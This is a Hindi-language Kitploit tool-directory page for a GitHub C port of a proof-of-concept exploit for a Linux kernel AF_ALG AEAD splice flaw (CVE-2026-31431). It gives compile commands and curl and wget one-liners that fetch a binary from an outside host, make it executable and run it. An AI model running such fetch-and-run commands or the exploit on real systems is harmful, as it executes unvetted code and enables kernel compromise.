Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-31431 — C पोर्ट एक proof-of-concept का, जो Linux kernel AF_ALG AEAD splice logic दोष (CVE-2026-31431) का शोषण करता है, शैक्षिक अनुसंधान के लिए। | Kitploit
उपकरण/GitHubGitHub/offsecguy/cve-2026-31431
भेद्यता विश्लेषणशोषणबाइनरी शोषण
GitHuboffsecguy/cve-2026-31431

CVE-2026-31431

C पोर्ट एक proof-of-concept का, जो Linux kernel AF_ALG AEAD splice logic दोष (CVE-2026-31431) का शोषण करता है, शैक्षिक अनुसंधान के लिए।

रिपॉजिटरी देखें
3 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

copy.fail — AF_ALG AEAD splice प्रिमिटिव (CVE-2026-31431)

अवलोकन

यह प्रोजेक्ट offsecguy द्वारा बनाए गए मूल Python प्रोटोटाइप का C पोर्ट है।
यह Linux कर्नेल क्रिप्टो API (AF_ALG) का उपयोग करता है:

  • authencesn(hmac(sha256),cbc(aes)) AEAD मोड
  • MSG_MORE फ्लैग
  • splice() सिस्टम कॉल

यह तकनीक केवल-पठनीय फ़ाइल डिस्क्रिप्टर से डेटा को क्रिप्टो सॉकेट के माध्यम से फीड करती है, और इसे चंक-दर-चंक प्रोसेस करती है।


⚙️ संकलन

विकल्प 1 — musl (स्टैटिक बिल्ड)

root@kitploit:~
musl-gcc -static -Os -s -o exp exp.c -I./zlib-1.3.2 -L./zlib-1.3.2 -lz

विकल्प 2 — GCC स्टैटिक

root@kitploit:~
gcc exp.c -o exp -lz -s -static

विकल्प 3 — GCC डायनामिक

root@kitploit:~
gcc exp.c -o exp -lz -s

🚀 रिमोट निष्पादन

root@kitploit:~
curl -sLo exp chosen.to/copyfail && chmod +x exp ; ./exp
root@kitploit:~
wget chosen.to/copyfail -qO exp && chmod +x exp ; ./exp

⚠️ नोट्स

  • AF_ALG के लिए Linux कर्नेल समर्थन आवश्यक है
  • डीकंप्रेसन के लिए zlib का उपयोग करता है
  • निम्न-स्तरीय कर्नेल क्रिप्टो इंटरैक्शन और प्रयोग के लिए डिज़ाइन किया गया है

अस्वीकरण

यह कोड केवल शैक्षिक और शोध उद्देश्यों के लिए प्रदान किया गया है।
जिम्मेदारी से उपयोग करें और केवल उन्हीं सिस्टम पर जिन्हें आप परीक्षण करने के लिए अधिकृत हैं।

टूल डाउनलोड करें